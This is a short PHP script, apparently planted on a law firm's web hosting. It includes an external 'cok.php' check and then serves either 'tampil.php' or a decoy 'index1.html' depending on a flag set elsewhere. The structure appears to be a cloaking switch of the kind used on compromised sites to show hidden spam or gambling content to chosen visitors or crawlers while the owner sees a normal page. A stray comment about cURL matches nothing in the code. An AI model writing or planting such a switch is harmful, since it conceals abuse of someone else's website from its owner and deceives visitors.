<?php
include '/home/juraga22/krlawfirm.co/cok.php';

$on = true;

    // Redirect based on the passed condition
    if ($passed === 'yes' && $on) {
        include_once "tampil.php";
        exit();
    } else {
        // Initialize cURL session
        include_once "index1.html";
        exit();
    }
?>